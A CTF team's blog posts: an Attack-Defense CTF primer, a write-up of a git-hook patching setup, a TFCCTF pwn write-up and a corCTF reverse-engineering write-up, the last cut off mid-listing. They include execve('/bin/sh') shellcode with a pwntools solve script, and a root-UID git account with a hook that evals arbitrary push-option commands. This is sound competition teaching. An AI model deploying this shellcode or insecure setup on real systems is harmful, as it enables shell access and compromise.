CTF @ UBC

A primer on Attack Defense CTFs

2025-09-23T00:00:00+00:00

Introduction and Target Audience

Hi! If you’re reading this, it means you’re atleast a little curious about Attack/Defense CTFs.

This guide assumes that you are familiar with:

the concept of Capture The Flag competitions (atleast Jeopardy CTFs)
what a flag looks like and how to find them.

If you’re still here, strap in tight while we explore what the heck an Attack Defense CTF is.

Flavours of CTFs

CTFs come in many flavors. The most common are Jeopardy, followed by Attack-Defense, and on rare occassions HackQuests (shout to hackceler8!). Each of these competition types require different skill sets revolving around cybersecurity.

Jeopardy: This is the most common type of CTF. Players solve from a list of challenges from different Categories (Web, Crypto, Pwn, Rev,misc). These challenges are hosted on a central server. Teams get points by attacking this challenge on the server and retrieving a flag. The competitions generally range from 24 to 48 hours and don’t require active involvement throughout the competition. Famouse Jeopardy CTFs include CSAW CTF, Plaid CTF, and Maple CTF :)
Attack-Defense: The original CTF type. Each Team is assigned a server in a shared network. Each server starts by hosting the same set of vulnerable services. Each round or tick (1-5 minutes long), Teams can gain points by attacking the services hosted on other teams’ servers to retrieve flags, and defending your services against attacks from other teams by patching out vulnerabilities without breaking its core functionality. The team with the highest points after X ticks win! These compeitions last around 6 - 10 hours and often require active player involvement. Popular A/D CTFs include DEF CON CTF, ENOWARS, and FAUST CTF.
HackQuests: This is just an example to demonstrate that CTFs don’t always fit in the above categories. A popular HackQuest is Hackceler8 (Google CTF Finals). In this competition, players are incentivized to find glitches in custom (retro) video games in order to achieve the fastest speedruns.

Attack-Defense CTFs

This is a more in-depth section that covers the specific details about Attack Defense (A/D) CTFs.

Game Duration & Ticks

An attack defense CTF typically runs for about 8 hours. It is played in rounds of 1 to 5 minutes called a tick.

A game that starts at 14:00 with 5 minute ticks will look as follows

+--------+----------------+
|  TICK  |     TIME       |
|--------+----------------|
|TICK 1  | 14:00 to 14:04 |
|--------+----------------|
|TICK 2  | 14:05 to 14:09 |
|--------+----------------|
|TICK 3  | 14:15 to 14:19 |
|--------+----------------|
|  ...   |      ...       |
+--------+----------------+

The Game Network & Your Vulnbox

When you register for an Attack-Defense competition, each team is assigned a server. This server is referred to as a Vulnbox. This “box” hosts a set of vulnerable services that your team attempts to defend.

The core of an A/D CTF is the Game Network. It refers to the computer network that connects all the Team boxes to each other. That is, allow you to access the services on other teams’ boxes and allow other teams to access the services on your box. Aside from vulnboxes, it also hosts a central gameserver.

The method used to host services vary from CTF to CTF. It can range from using docker compose for each service to having a VM for each service.

(TODO: add photo of game network and examples of CTFs with docker compose)

VPNs, vulnbox setup and whatnot

To connect your vulnbox to the game network and also generally access game resources like the flag submitter or an internal scoreboard, competitions provide you a VPN configuration, maybe in the form of a wireguard configuration. Teams can use this VPN configuration to submit flags from their local machine or even attack other teams from their local machine to save compute resources on your vulnbox.

Vulnbox setups differs between competitions. Some competitions like ENOWARS has historically provided teams with a virtual machine as their vulnbox with minimal setup required, others like FAUST CTF expect you to provide your own machine to connect to the game network and need you to apply a VM image to set your vulnbox up.

Services

A service in an A/D CTF refers to a computer program/application that contain one or more vulnerabilities. A service can be considered as the A/D analogue for a challenge in Jeopardy CTF.

Similar to challenges in a Jeopardy CTF, services can fall into one or more categories such as Web, Crypto, Pwn, rev, etc. They can also provide you with the source code or only provide you with a binary executable for your team to reverse and exploit.

Here are a few examples of services:

piratesay: From ENOWARS 8, this service mimics a pirate-themed dark web forum where users can chat and brag about exploits. The service falls into the pwn category and only provides a binary executable.
nautro: From DEF CON 33 CTF , A Balatro-like resource management card game where players attempt to maximize their resources by playing cards. This service falls into the miscellaneous category, and only provides a binary executable.
quickr-maps: From FAUST CTF 2024, a location sharing application with an API. This falls into the Web category, and it contains the Go/Python source code.

Note: The above services are of the Attack Defense Category of Services. Services can also use the “King of The Hill” format for scoring.

King of The Hill (KotH)

TODO at a later date.

No attack or defense involved. Services revolve around scoring the highest number of points among the other teams. It’s typically only seen in smaller A/D Competitions like DEF CON CTF (12 teams).

Scoring Points

There are 3 ways to score points in an A/D CTF. Each compeition places a different weightage on these components.

For each tick, you can win points from:

Attack Points: Points you gain from exploiting another team’s service and submitting their flag. The more teams you exploit, the more points you gain.
Defense Points: Points you gain if no other team (fully) exploits your service. One service might have multiple flags.
SLA Points: Points you gain by having an active and reachable service which passes a set of tests from the gameserver.

At any given tick, each of your services might be in the following states (varies between CTFs):

OK: Everything working fine
DOWN: Service not running or another error in the network connection, e.g. a timeout or connection abort
FAULTY: Service is available, but not behaving as expected (fails SLA)
FLAG_NOT_FOUND: Service is behaving as expected, but a flag could not be retrieved
RECOVERING: Service is behaving as expected, at least one flag could be retrieved, but one or more from previous ticks could not.

(adapted from https://ctf-gameserver.org/checkers/#check-results)

The Gameserver

The gameserver is a machine/set of machines in the game network that plays a variety of roles.

It is responsible for:

Placing flags in your services every tick
Running tests against each service every tick. (SLA)
Flag submission
Providing additional information about services if required.
Anonymizing web traffic (sometimes)

Attacking Services, Attack Info and Flag stores

Attacking a service is similar to exploiting a challenge in a Jeopardy CTF. The general workflow is to find a vulnerability, exploit it to retrieve the flag.

Services typically can contain multiple flags, the location of each flag is often referred to as a flag store. An example of a flag store in piratesay from earlier would be the secrets file associated with each user account on the web forum. The same service also has another flag store in the from .treasure files which are password-protected.

Finding the flag stores can be unclear. However, examining the source code or reverse engineering the service is helpful. More on this in the later sections.

Attack Info is a special and very important API endpoint on the gameserver that provides useful information about the flag stores for each Team’s service for the last few ticks. This can be in the form of user IDs, file paths, and more.

Attack Info is typically presented as a large JSON with the following schema. (varies from CTF to CTF)

{
    "team1": {
        "tick n":
            {
                "flagstore 1": ["data"],
                "flagstore 2": ["more", "data"]
            }, 
        "tick n-1":
            {
                "flagstore 1": ["otherdata"],
                "flagstore 2": ["dead", "beef"]
            }, 
        "tick n-3":
            {
                "flagstore 1": ["data"],
                "flagstore 2": ["deadbeef", "face"]
            }, 
            
    },
    "team2":,
    "team3":,
    ...
}

Here is a real example of the attack info from [ENOWARS 9 - timetype] which displayed the Attack Info for the last 10 ticks.

{
...
 "10.1.26.1": {
        "205": {
          "1": [
            "hlU9y0DChKvoaWz"
          ],
          "2": [
            "PBPXITUPPU"
          ]
        },
        "206": {
          "1": [
            "4PZafbjfHLguKBX"
          ],
          "2": [
            "A460UZVSHR"
          ]
        },
        "207": {
          "1": [
            "VbaVyFL82Gi"
          ],
          "2": [
            "6KTHS66AUK"
          ]
        },
        "208": {
          "1": [
            "CsYkxqsbmu0"
          ],
          "2": [
            "PKFTDKIFPR"
          ]
        },
        "209": {
          "1": [
            "jOE2Vs2H"
          ],
          "2": [
            "59ZZEVTEK6"
          ]
        },
        "210": {
          "1": [
            "mPC5pP9JOEmb5W"
          ],
          "2": [
            "XUVI2O4HQO"
          ]
        },
        "211": {
          "1": [
            "umbqwFv4VkOw"
          ]
        },
        "212": {
          "1": [
            "6fHMlCfIbmZ1HG"
          ],
          "2": [
            "M9LGS3ZSEB"
          ]
        },
        "213": {
          "1": [
            "GBtSMPAv"
          ],
          "2": [
            "8U57UI01UA"
          ]
        },
        "214": {
          "1": [
            "H8Tu4MelKHHU9"
          ],
          "2": [
            "5JXUWCCXW7"
          ]
        }
      },
...
}

Note: some A/D CTFs do not have Attack Info endpoints.

If a CTF does have this endpoint, it’s ALWAYS a good idea to check it for useful information that helps you understand and exploit a challenge.

Finally, it’s important to make sure that your exploits can run fast enough to retrieve the flag before it expires. Flags expire after X ticks. (X is set by the A/D CTF).

Defending Services and Patching

So, you found a vulnerability in your service. Now what? Well, you get to patch it.

Depending on the service and the game setup which varies from CTF to CTF, patching ranges from being a trivial task to annoyingly tedious.

If patching source code: If your patch involves modifying the source code written in Python/Go/Java/etc, it’s a simply a matter of changing the code, recompiling the program if neccessary and restarting the service (via docker compose or VMs).

If patching a binary (binpatching): If your patch needs to be applied on a binary executable, you would need to use a utility like pwntools patching or patchelf to patch the bytes/assembly code.

Note that when you “push” your patch to your service, you might have to take it down for a tick losing out on sweet sweet SLA points. Even if your service “recovers”, you might end up failing the SLA.

the Service Level Agreement (SLA)

At this point, you might wonder why you cannot patch your service by disabling access to all features. The issue is that you might fail the SLA.

As mentioned earlier, a Service Level Agreement (SLA) is set of tests that the gameserver runs against your services every tick. These tests are intended to ensure that your service still maintains its core features. A messaging app should be able to send/recieve messages, a game about cards should allow you to play the cards, and so on.

If your services pass these tests, your team recieves points for having a functional service. If your services fail these tests, your team does not recieve SLA points or defense points.

The Secret Other Thing: Network Traffic Analysis

A team’s biggest asset for Attack/Defense CTFs is the network traffic it recieves from other teams.

Each tick, your team is able to capture the packets sent to it in the form of PCAPs.

Analyzing the payloads that other teams send to your service is extremely insightful. This data can help you find vulnerabilities in your services by showing you where to look in the service’s code. This information can also help you learn more about the service as well as help you write exploits to attack other teams. PCAPs can also be useful to identify how other teams might be stepping around your patches to services.

Traffic Analysis is an essential tool to succeed at Attack Defense CTFs. Teams often have extensive Infrastructure dedicating to capturing and analyzing packets.

Flag submission

Once you captured the flag (haha), you need to submit them to recieve points for the tick. It’s generally as simple as sending newline separated flags to a port at the submission URL.

More details can be found here. It does a much better job at explaining the internals of flag submitters if you’re interested.

AD Infrastructure

To succeed in an Attack-Defense CTF, you must have infrastructure/tooling to automate/avoid repetitive tasks. The infrastructure can be as simple as a bash script that helps you submit flags to a bespoke application built from the ground up to efficiently analyze PCAPs.

Having access to tooling during the competition, enables your team to focus more of their precious resources on looking at services rather than remembering to run your exploit script every tick.

Infrastructure can define difference between winning and losing a game. Naturally, many teams are secretive about the tools/infrastructure that they use.

Let’s go through a few common tools many teams would use:

Throwers

A thrower is a tool that runs your exploit script against all the other boxes on the network and submits recieved flags for you. It’s a great abstraction that takes care of:

Running exploits each team
Using the team-specifc and tick-specifc information about a service (attack info)
Submitting flags

A thrower might take the form of an exploit template that members can write and throw exploits with.

A popular “off-the-shelf” thrower is ataka

PCAP Analyzers

A PCAP Analyzer is an application that is used to tag, view, filter, and analyze Packet Capture data uploaded to it. These tools often have UIs where you are able to filter for and tag certain patterns in a packet such as path_traversal when you see a pattern of ../../../. By filtering through and monitoring data sent to services, you can gain a clearer understanding of how services work and how to approach exploiting/patching them.

There are plenty of popular “off-the-shelf” PCAP analyzers. The most commonly used tool is Tulip.

Patcher

A Patcher is a nice-to-have tool to reliably patch services in the competitions and avoiding the need to SSH into the vulnbox each time.

There are many solutions to patching. One such solution is to use git. You can read more about this in our previous writeup Patching infrastructure for attack-defense CTFs.

Anything you find useful :D

Yeah. What the title says. Tooling is an iterative process. As you compete in more CTFs, you find more use cases and functionalities in existing tools that are missing.

It’s a very exciting experience to build your own tooling from scratch that’s custom built for a CTF. Maybe you feel that you’re basically copy-pasting machine between your code editor and chatGPT, try to write a tool to automate triage with LLMs! There is an infinite potential for new tools you never knew you needed :D

An Important Conclusion

Overwhelmed? It’s a lot of information to process in a single page. The best way to learn is to partcipate in competitions and learn as you go. The most exciting part is failing, iterating and improving for the years moving forward.

Each step towards improving your team’s processes, communication, and team allocation strategy to services, tooling is step for growth. Remember that the most important rule in CTFing is to have fun <3

Resources

https://glitchrange.com/attack-defense: A quick overview of A/D CTFs.
https://2025.faustctf.net/information/attackdefense-for-beginners/: Rules and the setup of a real Attack Defense CTF
https://ctf-gameserver.org/: An excellent resource going over organizing Attack Defense CTFs

[FAUST 2024] Patching infrastructure for attack-defense CTFs

2024-09-30T00:00:00+00:00

This is a writeup of the patching setup Maple Bacon used in FAUST 2024.

This last weekend, we played in FAUST CTF 2024. While we were limited on manpower & had to scramble about with challenges, it was still quite a lot of fun.

FAUST provided eight challenges:

floppcraft: xxe + ssrf + fixed jwt signing
quickr-maps: url injection + ssrf, flags plotted as QR codes
secretchannel: bit flipping token id
todo-list: user id collision
lvm: type confusion pwn
asm-chat: insecure session handling
missions: cache shenanigans
vault: hardcoded rsa n

Out of those, no one was able to exploit one (lvm), and only a handful of teams had an exploit for another (missions). We had working exploits for three: floppcraft, todo-list, and asm_chat, and had a nearly-working exploit for quickr-maps. We were able to patch floppcraft and asm_chat entirely, and partially patch quickr-maps, todo-list-service, and vault. We placed 27th, but peaked at 20th (when our exploits were all mostly working). Overall pretty alright! Not our best performance, but it was the first time we had played in an A/D CTF in a while.

I handled defense + patching + network analysis infrastructure. We used an entirely new system for patching that worked quite well (despite putting it together a week before the competition) - so I figured I’d write up a little something on it.

Design

In previous years, we’ve managed patching by SSHing into the box and manually editing the appropriate files + rebuilding. This sucks, for everyone involved - and if patches are more than a couple of lines long, it really sucks. We’ve used Git for ease of rollback / version history, but only to track services on the box itself. This got me thinking: could we just… set up a Git server on the box and push patches directly to it? We would need some way to treat a normal repo as an origin, though. And the Git server expects its origin repositories to be “bare”. So that wouldn’t work directly.

Or would it? As it turns out, the “bare” requirement is just a configuration option and can be disabled. Treating an ordinary Git repository as an origin repo has several issues to watch out for, however: every file must be owned by the git user and you cannot have working/staged changes in the origin repository. But that’s it. Otherwise, it works fine. Ownership issues can be circumvented by treating the git user as root: not the best security practice, for sure, but fine for a team-internal server. This will let authorized users clone services with git clone git@:/srv/, develop patches locally, and push their changes with git push.

Typically, services will need to be rebuilt for changes to be applied. While this is a nicer design for pushing patches, deploying those patches still means SSHing into the box, navigating to the challenge, and running docker-compose up -d --build or similar. Can this process be made any more streamlined?

As it turns out - Git supports has a rich hooks system that we can adapt for our purposes. These hooks can run at arbitrary points in the Git workflow process - but the two we’re interested in are pre-receive and post-receive, as they are the only hooks that can take user-specified parameters (with the --push-option flag). The pre-receive hook runs immediately upon receiving a git push. The post-receive hook runs immediately after all new references are processed, and only if a reference was updated as a result. This isn’t perfect - it would be convenient if we could run the hook regardless of push success, so that in case a deploy fails at first we can run another commit - but it will suffice.

Creating a custom post-receive hook is straightforward. The Git documentation provides an example service, which we can modify to serve our purposes:

#!/bin/sh
#
# A hook script to execute arbitrary code from push options.
# This script will run when a new push is successful and the
# --push-option flag has been used at least once.
# It will execute the commands in the push-option in sequence.

if test -n "$GIT_PUSH_OPTION_COUNT"
then
    i=0
    while test "$i" -lt "$GIT_PUSH_OPTION_COUNT"
    do # this is exceptionally ugly but needed for indirect variables
        eval "action=\$GIT_PUSH_OPTION_$i"
        echo "$action"
        eval "$action"
        i=$((i + 1))
    done
fi

This hook must be placed in .git/hooks/post-receive, and be made executable. If desired, hooks can be installed globally by setting the global core.hooksPath configuration option. This is convenient for our purposes. Now, arbitrary build commands can be executed after a (successful) push with ex. git push --push-option="docker-compose up -d --build"

Configuration

With fairly minimal configuration, we can get this all set up:

Create a new user git w/ the same UID/GID as root and w/ git-shell as their login shell:

useradd -ou 0 -g 0 --system --disabled-password --create-home --shell /usr/bin/git-shell git

Generate SSH keys for the git user:

git ssh-keygen -t ed25519 -N '' -f /home/git/.ssh/id_ed25519

Install authorized_keys, disable password authentication, install post-receive hooks, etc:

mv authorized_keys /home/git/.ssh/authorized_keys && chmod 640 /home/git/.ssh/authorized_keys
echo "PasswordAuthentication no" >> /etc/ssh/ssh_config
mv post-receive /home/git/hooks/post-receive && chmod 777 /home/git/hooks/post-receive

Be sure to run systemctl restart sshd after making these changes.

The following settings must be made for the git user:

git config --global receive.denyCurrentBranch updateInstead
git config --global receive.advertisePushOptions true
git config --global core.hooksPath /home/git/hooks/

These settings allow pushing to non-bare repos, allow the use of --push-option, and allow the installation of global commit hooks. The following settings are also recommended:

git config --global user.name "vulnbox"
git config --global user.email "vulnbox@example.com"
git config --global init.defaultBranch main

Now, upon the release of services, check them into Git. If there is any mutable data, remove it from Git tracking to avoid unstaged data issues.

git init && git stage . && git commit -m "initial commit"
git rm -r --cached data/ && git commit -m "do not track mutable data"

And that’s all you need. The SSH server will handle anyone connecting to the box via Git, and plumb them into git-shell so that cloning/pulling/pushing works.

If you encounter errors of the form ! [remote rejected], ensure that there are no uncommitted changes in any service. Be sure to remove mutable state from Git tracking to prevent this.

Hopefully this writeup is helpful to any teams new to the attack-defense format. If you find it useful, or have come up with any improvements that have worked for your team - let us know! We’re contactable over Mastodon, Twitter, and email.

[TFCCTF 2024] Santa’s Little Helper

2024-08-05T00:00:00+00:00

Ayyy misc pwn.

Challenge

Santa doesn’t have a lot of room left in his sleigh. Help him fit one more item

The binary source file is provided, decompiling with Ghidra:

undefined8 main(void)

{
    int iVar1;
    long in_FS_OFFSET;
    int local_ac;
    char *local_a0;
    char *local_98;
    undefined8 local_90;
    char local_88 [120];
    long local_10;
    
    local_10 = *(long *)(in_FS_OFFSET + 0x28);
    read(0,local_88,0x78);
    local_90 = 0x10102464c457f;
    for (local_ac = 0; local_ac < 8; local_ac = local_ac + 1) {
        if (local_88[(long)local_ac + -8] != local_88[local_ac]) {
        write(1,"Not an ELF file\n",0x10);
                        /* WARNING: Subroutine does not return */
        exit(1);
        }
    }
    iVar1 = memfd_create("program",0);
    if (iVar1 == -1) {
        write(1,"Failed to create memfd\n",0x17);
                        /* WARNING: Subroutine does not return */
        exit(1);
    }
    write(iVar1,local_88,0x78);
    local_a0 = (char *)0x0;
    local_98 = (char *)0x0;
    iVar1 = fexecve(iVar1,&local_a0,&local_98);
    if (iVar1 == -1) {
        write(1,"Failed to execute\n",0x12);
                        /* WARNING: Subroutine does not return */
        exit(1);
    }
    if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                        /* WARNING: Subroutine does not return */
        __stack_chk_fail();
    }
    return 0;
}

Looks fairly straightforward – essentially, it takes up to 120 bytes of input (as an ELF file) that starts with 7f 45 4c 46 02 01 01 00 (with some dynamic debugging on the for loop), write the input into an anonymous file created by memfd_create, and executes that file. If the file does something like execve("/bin/sh", -, -), we get a shell. Simple.

First Attempt: compiling C

Since we need an 64ELF (for the header constraint), as the first attempt, I tried to compile bare assembly within a c program:

int main() {
    __asm__ (
        "movq $0x0068732f6e69622f, %%rbx\n\t" // '/bin/sh\x00'
        "push %%rbx\n\t"
        "movq %%rsp, %%rdi\n\t" // rdi points to '/bin/sh', rsi and rdx don't really matter for /bin/sh
        "movl $0x3b, %%eax\n\t" // rax = 0x3b for execve
        "syscall\n\t"
        :
        :
        : "rdi", "rbx", "eax"
    );
}

However, the ELF is 15KB (more than 100x the size of the acceptable input). Even with some optimization, the size of the resulting ELF’s size is not even close to 120 bytes. So this is definitely not the way – the problem with compiling a C program to an ELF is that the compiler includes too many unneccessary parts such as .plt, .init, .bss. We don’t need any of those – just need it to jump to the shellcode and execute it. This begs the question – what is the bare minimum for an 64ELF?

The smallest ELFs?

This github repo shows some interesting ELFs. golfed.polymorphic.execve.x86 is 76 bytes that gets a shell but the first eight bytes does not match the restriction of this challenge. base.bin is a 64ELF that starts with 7f 45 4c 46 02 01 01 00 and is 128 bytes. In particular, it contains only the ELF header, the Program header, and three x86 instructions. So persumably, only the ELF header and the program header are the bare minimum for a valid ELF. The problem is that the two headers together are already 120 bytes! So, without some tricks, we won’t be able to do anything. Before diving into those tricks, let’s take a look at the semantics of those headers.

A little detour to the 64ELF header and Program Header (Ph) table

The 64ELF header has a fixed size of 0x3e bytes:

typedef struct
{
  unsigned char	e_ident[EI_NIDENT];	/* Magic number and other info */
  Elf64_Half	e_type;			/* Object file type */
  Elf64_Half	e_machine;		/* Architecture */
  Elf64_Word	e_version;		/* Object file version */
  Elf64_Addr	e_entry;		/* Entry point virtual address */
  Elf64_Off	    e_phoff;		/* Program header table file offset */
  Elf64_Off	    e_shoff;		/* Section header table file offset */
  Elf64_Word	e_flags;		/* Processor-specific flags */
  Elf64_Half	e_ehsize;		/* ELF header size in bytes */
  Elf64_Half	e_phentsize;	/* Program header table entry size */
  Elf64_Half	e_phnum;		/* Program header table entry count */
  Elf64_Half	e_shentsize;	/* Section header table entry size */
  Elf64_Half	e_shnum;		/* Section header table entry count */
  Elf64_Half	e_shstrndx;		/* Section header string table index */
} Elf64_Ehdr;

The first 0x10 bytes of an ELF file is its identifier – an ELF file always starts with the four magic bytes 7f 45 4c 46. The next 5 bytes indicate its fundamental properties such as endianness and the type of th ELF header (32ELF vs 64ELF). Followed by 7 bytes of padding (for future extension, foreshadowing). The rest of the ELF header fields are shown in the comments. Since the ELF header size is fixed, I tried to patch out the program header by setting e_phnum = 0. However, that resulted in

bash: ./base.bin: cannot execute binary file: Exec format error

Therefore, my conclusion is that there must be a program header for an ELF. So, I tried to strink the size of the program header. In base.bin, e_phentsize = 0x38. I tried to change that value, but it also resulted in the above error. So, let’s take a look at the program header struct:

typedef struct
{
  Elf64_Word	p_type;			/* Segment type */
  Elf64_Word	p_flags;		/* Segment flags */
  Elf64_Off	    p_offset;		/* Segment file offset */
  Elf64_Addr	p_vaddr;		/* Segment virtual address */
  Elf64_Addr	p_paddr;		/* Segment physical address */
  Elf64_Xword	p_filesz;		/* Segment size in file */
  Elf64_Xword	p_memsz;		/* Segment size in memory */
  Elf64_Xword	p_align;		/* Segment alignment */
} Elf64_Phdr;

So, persumably, the program header has a fixed size.

Trick 1: Header overlay

As detailed here, if the end of the ELF header matches with the start of the program header, we can shift the start of the program header by changing the value of e_phoff (the offset of the program header from the start of the binary). Decompiling base.bin with Ghidra, we see:

Hmmm, doesn’t match exactly. But the 0x38th (in this post, all indices are 0-indexed unless otherwise specified) byte (the number of program headers) is 0x01 which matches with the first byte of the program header. To make them match, I patched the 0x3cth bytes to be 0x05. That doesn’t cause any issues – the reason being e_shoff = 0, indicating there is no section header. Great, so the effective size of the program header is reduced by 8 bytes (the size of the overlay)!

The shortest x86 shellcode?

So, the effective total size of the headers is reduced to 112 bytes. But we still need to place the actual shellcode into the ELF. Translating the above C code into x86:

mov rbx, 0x68732f6e69622f2f
push rbx 
mov rdi, rsp 
mov eax, 0x3b
syscall

This gives a shell and is only 21 bytes which is fairly short but we can make it even shorter by replacing the second and third mov with push + pop:

mov rbx, 0x0068732f6e69622f
push rbx
push rsp
pop rdi
push 0x3b
pop rax
syscall

Compile it and we get 18 bytes! (Please let me know if you can craft an even shorter x86 shellcode.) So with header overlay, we have a total of 130 bytes. Still need to reduce it by at least 10 bytes!

(Side note: While writing this writeup, I realized that it might have been easier if I changed e_machine to be i386 so that the program header is smaller. )

Trick 2: Program header and `.text` overlay

Similar to the first trick, why don’t we try to overlay the program header and the .text section? After all, they are just bytes! This works up to 8 bytes – I removed the last 8 bytes from the program header and directly appended the shellcode right after (+ adjusting e_entry). Apparently, neither the file parser nor the virtual address space care about the segment alignment. If we go beyond 8 bytes – we are overwriting the p_memsz and that causes an error because there is simply not that much memory (as we will be writing the most significant byte of the p_memsz)!

122 bytes! 2 more to go!

Trick 3: Store data within the ELF header

At first, it seems a bit hopeless – to my knowledge, the x86 shellcode is optimized as much as possible and the effective headers size cannot be reduced. However, I recall from here that instructions can be placed inside the ELF header padding. Unfortunately, I couldn’t make that work with header overlay (it works without header overlay). But, in a similar way, I thought we can actually place the '/bin/sh' string there as well. And that worked by overwriting the 8th bytes and the padding (8 bytes of data in total)! The final shellcode looks like:

; in ./sc.asm
mov rdi, 0x0400008 ; where /bin/sh is 
push 0x3b
pop rax
syscall

This works because PIE is not enabled (for more about PIE, see here).

114 bytes and flag! Ayyy!

Solve script

from pwn import *
context.log_level = 'debug'
# io = remote('challs.tfcctf.com', 32501)
io = process('./santas_little_helper')

bs = bytearray()
with open('./base.bin', 'rb') as header: 
    arr = header.read()
    tmp = bytearray(arr[:0x40])
    tmp += arr[0x48:0x78-0x8] # trick 1 + trick 2: don't need the beginning and the end of the Ph (program header) for the overlays
    tmp[0x18] = len(tmp) # trick 2: change e_entry so that it's immediately after the Ph
    tmp[0x20] = 0x38 # trick 1: shifting the start of Ph by changing e_phoff 
    tmp[0x3c] = 0x5 # trick 1: change the end of the ELF header so that the overlay works
    bs += tmp

# from `nasm -f bin -o sc sc.asm`
with open('./sc', 'rb') as sc: # append the shellcode from above
    arr = sc.read()
    bs += arr 
    for i, b in enumerate(p64(0x0068732f6e69622f)): # trick 3
        bs[0x8 + i] = b

io.send(bytes(bs))

io.interactive()

[corCTF 2024] digest-me

2024-07-29T00:00:00+00:00

Having no solves yet in the rev category with one day remaining in corCTF 2024, I decided to have a gander at something that looked approachable. The two easiest challenges at the time by solve count were corMine: The Beginning and its sequel corMine 2: Revelations, which was a game of some sort. However, I eventually gave up after 5+ minutes trying to get the game to just run! But I guess I don’t feel so bad seeing as my teammates couldn’t figure it out either :’)

corMine refusing to run without a GPU smh

The next easiest one on the list was called digest-me, which is the topic of this post and what I poured most of my time on for the next 24 hours. Luckily, this one was a simple binary that asked you to input a flag, and told you whether it was correct. These kinds of programs are common enough in CTFs that they adopt a not-so-special name called a flag checker.

Challenge

The description gives us a few clues, perhaps it has something to do with hashing and bits (?), but otherwise just contains the average lore.

FizzBuzz101 was innocently writing a new, top-secret compiler when his computer was Crowdstriked. Worse, the recovery key is behind a hasher that he wrote and compiled himself, and he can’t remember how the bits work! Can you help him get his life’s work back?

Here is a sample interaction from the digestme binary:

$ ./digestme
Welcome!
Please enter the flag here:
corctf{what}
Try again:
corctf{potatoes}
Try again:

It’s too big

One problem immediately came up when opening the program in Ghidra – it refused to decompile main()! Examining the disassembly to see what could possibly have went wrong, I was horrified to witness a chain of about 300,000 instructions consisting solely of mov, and, or and xor:

Luckily, I worked around this by patching ret instructions near the top and bottom of main() to ensure Ghidra doesn’t try to decompile all of it. That allows us to finally see the start of the function.

Brute force?

Through a combination of static and dynamic analysis, I was able to constrain the flag to a set of preconditions that were enforced by those ifs:

len(flag) == 19
flag[:7] == "corctf{"
flag[8] == flag[17]
flag[9] == flag[11]
flag[7] == flag[16] + 1
flag[14] == flag[16] + 4

The short flag certainly raised my eyebrows about the possibility of brute force. There were 11 unknown bytes but 4 of those can be disregarded because of the extra constraints, for a total of 95^7 = 69,833,729,609,375 possible flags (assuming the flag is printable).

However, it’s worth noting that each run would require at least 300,000 instructions, and 2 days would not nearly be enough to find the flag in time on my poor 4-core Intel-i5 laptop.

The rest of the program is focused on executing the said 300,000 instructions, which judging by the disassembly just seems to be a bunch of operations on an array. A is initialized at the start via A = (byte *)calloc(1,100000), which allocates a zero-filled 100,000-byte array.

The flag is then loaded into A by converting each byte inside corctf{...} into 8 bits, and then loading the bits starting from the offset *(A+0x940) in big-endian order. For those who speak Python, that looks something like this:

A[0x940:0x998] = [(c >> i) & 1 for c in code[7:-1] for i in range(7, -1, -1)]

After the extremely long chain of array operations, the first 128 bits of A are converted into 4 32-bit integers (call them a, b, c, d). The flag checker outputs Nice! if c == 0x19c603b and d == 0x14353ce (A.K.A. the target condition).

Reversing the elephant in the room

Now that it was clear how the program was checking the flag, I worked on parsing the long array operations into something more readable. Once we had the instructions in a higher-level language, it would be possible in theory to rely on z3 to recover the flag for us.

Instead of bashing Ghidra to decompile everything for us, I used capstone to parse the machine code into a clean disassembly:

from capstone import *

with open('digestme', 'rb') as f:
    binary = f.read()

code = binary[0x1290:0xed854]

cs = Cs(CS_ARCH_X86, CS_MODE_64)
instructions = cs.disasm(code, 0)

for inst in instructions:
    print(inst.mnemonic, inst.op_str)

After combing through the output, I was surprised to find only two distinct groups of instructions. It was either a simple mov in the form,

mov byte ptr [rax + X], Y

which maps to A[X] = Y, or

mov cl, byte ptr [rax + X]
 cl, byte ptr [rax + Y]
mov byte ptr [rax + Z], cl

which maps to A[Z] = A[X] A[Y] where ∈ [and, or, xor].

This made it relatively easy to decompile with a little bit of regex:

from capstone import *
import re

with open('digestme', 'rb') as f:
    binary = f.read()

OP_MAP = {'and': '&', 'or': '|', 'xor': '^'}

code = binary[0x1290:0xed854]

cs = Cs(CS_ARCH_X86, CS_MODE_64)
instructions = cs.disasm(code, 0)

commands = []

while (inst := next(instructions, None)) is not None:
    assert inst.mnemonic == 'mov'

    if m := re.fullmatch(r'byte ptr \[rax( \+ (\w+)|)\], ([01])', inst.op_str):
        out = int(m[2], 0) if m[2] else 0
        val = int(m[3])
        commands.append(f'A[{out:#x}] = {val}')
    else:
        m = re.fullmatch(r'cl, byte ptr \[rax( \+ (\w+)|)\]', inst.op_str)
        in1 = int(m[2], 0) if m[2] else 0

        inst = next(instructions)
        m = re.fullmatch(r'cl, byte ptr \[rax( \+ (\w+)|)\]', inst.op_str)
        in2 = int(m[2], 0) if m[2] else 0
        op = OP_MAP[inst.mnemonic]

        inst = next(instructions)
        m = re.fullmatch(r'byte ptr \[rax( \+ (\w+)|)\], cl', inst.op_str)
        out = int(m[2], 0) if m[2] else 0

        commands.append(f'A[{out:#x}] = A[{in1:#x}] {op} A[{in2:#x}]')

print(len(commands))

with open('commands.txt', 'w') as f:
    for cmd in commands:
        f.write(cmd + '\n')

I also printed out the number of commands, which came out at a respectable 60,180. Still far from being ideal of course.

Given the description of the challenge, I figured this was some hashing algorithm that was obfuscated by bit manipulations. Looking through the commands.txt file, I noticed that there was a lot of repetition. In fact, it almost always performed one of &, |, or ^ in 32-bit chunks like this:

A[0x0] = A[0xfa0] | A[0x100]
A[0x1] = A[0xfa1] | A[0x101]
A[0x2] = A[0xfa2] | A[0x102]
A[0x3] = A[0xfa3] | A[0x103]
...
A[0x1f] = A[0xfbf] | A[0x11f]

However, there were also certain chunks that had all the operators combined in a mixed order, which strangely always came in groups of 157 that repeated ^, ^, &, &, | cylically.

A[0xe7] = A[0xc7] ^ A[0x27]
A[0xb40] = A[0xc7] & A[0x27]
A[0xb41] = A[0xc6] ^ A[0x26]
A[0xe6] = A[0xb41] ^ A[0xb40]
A[0xb40] = A[0xb41] & A[0xb40]
A[0xb41] = A[0xc6] & A[0x26]
A[0xb40] = A[0xb41] | A[0xb40]
A[0xb41] = A[0xc5] ^ A[0x25]
A[0xe5] = A[0xb41] ^ A[0xb40]
A[0xb40] = A[0xb41] & A[0xb40]
A[0xb41] = A[0xc5] & A[0x25]
A[0xb40] = A[0xb41] | A[0xb40]
A[0xb41] = A[0xc4] ^ A[0x24]
A[0xe4] = A[0xb41] ^ A[0xb40]
